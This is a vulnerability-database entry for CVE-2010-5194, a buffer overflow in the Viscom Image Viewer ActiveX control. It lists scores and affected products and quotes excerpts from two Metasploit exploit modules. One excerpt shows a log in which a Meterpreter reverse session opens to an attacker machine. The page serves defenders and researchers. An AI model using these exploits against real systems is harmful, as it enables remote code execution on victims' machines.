CVE-2010-5194
published 2012-08-31CVE-2010-5194: Stack-based buffer overflow in the Image2PDF function in the SCRIBBLE.ScribbleCtrl.1 ActiveX control (ImageViewer2.ocx) in Viscom Image Viewer CP Pro 8.0, Gold…
PriorityP352critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.34%
92.8th percentile
Stack-based buffer overflow in the Image2PDF function in the SCRIBBLE.ScribbleCtrl.1 ActiveX control (ImageViewer2.ocx) in Viscom Image Viewer CP Pro 8.0, Gold 5.5, Gold 6.0, and earlier allows remote attackers to execute arbitrary code via a long strPDFFile parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| viscomsoft | image_viewer_cp_gold_sdk | — | — |
| viscomsoft | image_viewer_cp_gold_sdk | — | — |
| viscomsoft | image_viewer_cp_pro_sdk | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)
exploitdb·2011-11-17
CVE-2010-5194 Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)
Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
'Description' => %q{
This module exploits a stack based buffer overflow in the Active control file
ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles()
method. Exploitation results in code execution with the privileges of the user who
browsed to the exploit page.
The victim will first be required to trust the publisher Viscom Softwa
Exploit-DB
Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
exploitdb·2010-12-02
CVE-2010-5194 Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
---
# Image Viewer CP gold v5.5 Buffer Overflow
# Found by: bz1p (AT) bshellz.net
# Impact: Low, NOT marked safe for scripting or initializing
# CVE: ? (0day)
#
# msf exploit(image_viewer_cpgold) >
# [*] Sending exploit to 172.17.120.211:1061...
# [*] Sending stage (749056 bytes) to 172.17.120.211
# [*] Meterpreter session 1 opened (172.17.120.235:4443 -> 172.17.120.211:1064) at 2010-11-15 18:11:32 +1100
#
# msf exploit(image_viewer_cpgold) > sessions -l
#
# Active sessions
# ===============
#
# Id Type Information Connection
# -- ---- ----------- ----------
# 1 meterpreter x86/win32 VICTIMXP\victim @ VICTIM 172.17.120.235:4443 -> 172.17.120.211:1064
#
# msf exploit(image_viewer_cpgold) > sessions -i 1
#
No writeups or analysis indexed.
http://secunia.com/advisories/42445http://www.exploit-db.com/exploits/15658http://www.osvdb.org/69566https://exchange.xforce.ibmcloud.com/vulnerabilities/63642http://secunia.com/advisories/42445http://www.exploit-db.com/exploits/15658http://www.osvdb.org/69566https://exchange.xforce.ibmcloud.com/vulnerabilities/63642
2012-08-31
Published